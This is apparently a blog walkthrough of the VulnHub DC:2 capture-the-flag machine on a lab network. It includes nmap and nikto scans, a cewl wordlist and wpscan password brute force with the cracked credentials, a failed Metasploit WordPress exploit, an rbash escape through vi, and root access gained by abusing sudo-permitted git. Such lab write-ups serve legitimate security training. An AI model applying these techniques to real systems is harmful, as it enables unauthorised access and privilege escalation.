We have just completed first vulnhub machine of DC series by DCAU in my last post. Lets move to the next challenge of the same series i.e DC:2. Like DC:1, there are many flags but the goal is to find the final flag in /root directory. According to the author, the machine is designed for beginners and knowledge of Linux Command Line is a must.
Setup and Configurations
You can download the VM from the vulnhub website. Run the VM in VirtualBox (or VMware player). I ran this VM at VirtualBox with Host-only Network Configurations.
You can configure Host-only Network in Virtualbox from File > Host Network Manager as shown below:
Finding Our Target
Let’s run our Nmap to enumerate the network and find the ip address of our target.
[email protected]:~# nmap -sn 192.168.56.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:11 IST Nmap scan report for 192.168.56.2 Host is up (0.000067s latency). MAC Address: 08:00:27:6B:82:6D (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.5 Host is up (0.00023s latency). MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.1 Host is up. Nmap done: 256 IP addresses (3 hosts up) scanned in 2.06 seconds
So 192.168.56.5 is our target’s ip (as 192.168.56.2 is for DHCP server and 192.168.56.1 is the ip of adapter or local machine as shown in Setup and Configuration).
First we need to find out what services are running on our target machine. As usual, We will use nmap for that.
[email protected]:~# nmap -p- -A 192.168.56.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-21 00:27 IST Nmap scan report for 192.168.56.5 Host is up (0.00038s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Did not follow redirect to http://dc-2/ 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 08:00:27:9A:59:02 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.38 ms 192.168.56.5 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds
So it has the Apache web server and SSH service running on a different port than the regular default of 22. We will first look into the web server but before doing that, we will add the following entry to the /etc/hosts file as advised by the author :
This will map ip address to dc-2. So whenever we will open any web page like http://dc-2/xyz in our laptop,it will look into the hosts file and will know that it has to go to http://192.168.56.5/xyz.
OK! Now lets navigate to the Website. It has five pages and one is of our interest.
Flag 1 basically gives a hint that in case of dictionary attack usual word lists may not work, so we need to be cewl. Cewl? Is it cool! Well maybe, it reminded me of the tool cewl in Kali which is used for making word lists from a websites contents.
Now we need to find out the target which is prone to dictionary attack. I ran Nikto to get more info and got this.
[email protected]:~# nikto -h http://dc-2 | tee nikto.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.56.5 + Target Hostname: dc-2 + Target Port: 80 + Start Time: 2019-05-23 00:09:02 (GMT5.5) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'link' found, with contents: <http://dc-2/>; rel=shortlink + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 + OSVDB-3233: /icons/README: Apache default file found. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version + /wp-links-opml.php: This WordPress script reveals the installed version. + OSVDB-3092: /license.txt: License file found may identify site software. + Cookie wordpress_test_cookie created without the httponly flag + /wp-login.php: WordPress login found + 7373 requests: 0 error(s) and 13 item(s) reported on remote host + End Time: 2019-05-23 00:09:26 (GMT5.5) (24 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
So we have WordPress login page – wp-login.php. Yeah It may be prone to dictionary attack. Lets make a wordlist with cewl and crack the login page with wpscan.
[email protected]:~# cewl -w dc.txt dc-2 CeWL 5.4.3 (Arkanoid) Robin Wood ([email protected]) (https://digi.ninja/)
where -w is used to give word list name.
So before we can do brute force passwords, we need to know the users. Wpscan will do both the work for us in single scan. I will be listing only the relevant output ( complete output was quite large).
[email protected]:~# wpscan --url http://dc-2 -P dc.txt -e _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.3.1 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_ _____________________________________________________________ [+] Performing password attack on Xmlrpc against 3 user/s [SUCCESS] - jerry / adipiscing [SUCCESS] - tom / parturient Trying admin / the Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55 Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55 WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError. Trying admin / see Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55 Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55 WARNING: Your progress bar is currently at 644 out of 644 and cannot be incremented. In v2.0.0 this will become a ProgressBar::InvalidProgressError. Trying admin / log Time: 00:00:55 <===============================================================================> (644 / 644) 100.00% Time: 00:00:55 [i] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient
So three users are detected – jerry, tom and admin. Except admin user, the password for other two were cracked.
There was one more interesting entry in the output of Nikto – /wp-links-opml.php which reveals the version of wordpress.
It has WordPress version 4.7.10, when searching for vulnerabilities I found https://www.cvedetails.com/cve/CVE-2019-8942 – Remote Code Execution and Yeah! It has metasploit module for that! So What are we waiting for? I used exploit/multi/http/wp_crop_rce module and exploit.
msf5 exploit(multi/http/wp_crop_rce) > exploit [*] Started reverse TCP handler on 192.168.56.1:4444 [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress [*] Exploit completed, but no session was created.
The target is indeed a WordPress target but we now have to find another way around.
After doing a lot of things, i finally tried logging through ssh with Tom’s credentials and it worked.
[email protected]:~# ssh -p 7744 [email protected] The authenticity of host '[dc-2]:7744 ([192.168.56.5]:7744)' can't be established. ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[dc-2]:7744,[192.168.56.5]:7744' (ECDSA) to the list of known hosts. [email protected]'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. [email protected]:~$ ls flag3.txt usr
I tried to open the flag3.txt but what i found was cat command does not exit. Surely we are stuck with a restricted shell. I checked the PATH variable and find out that we can use vi.
[email protected]:~$ cat flag3.txt -rbash: cat: command not found [email protected]:~$ echo $PATH /home/tom/usr/bin [email protected]:~$ ls /home/tom/usr/bin less ls scp vi [email protected]:~$ vi flag3.txt
Flag3.txt gives us the folowing hint:
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
We need to change user to jerry but su command is not in our allowed command’s list. Here is where the knowledge of linux and how to escape restricted shells helped me! I used vi to escape restricted shell.
~ ~ ~ :set shell=/bin/bash
and then run shell
~ ~ :shell
And that worked. I now exported PATH variable so that i can execute all commands.
[email protected]:~$ export PATH=/bin:/usr/bin:$PATH [email protected]:~$ cat flag3.txt Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
We can see that cat is working now. Lets su to jerry.
[email protected]:~$ su jerry Password: [email protected]:/home/tom$ cd /home/jerry [email protected]:~$ ls flag4.txt [email protected]:~$ cat flag4.txt Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-) Go on - git outta here!!!!
No hints now? but still : git outta here!! May be Git does not require root password. Lets check with sudo -l.
[email protected]:~$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git
Yes, Lets finish this! Help command of git comes with text editor where we can run command.
[email protected]:~$ sudo git help add
And Boom!! we got a root shell.
That is it guyz. If you people have any doubt or want me to solve any particular CTF, do mention in comments.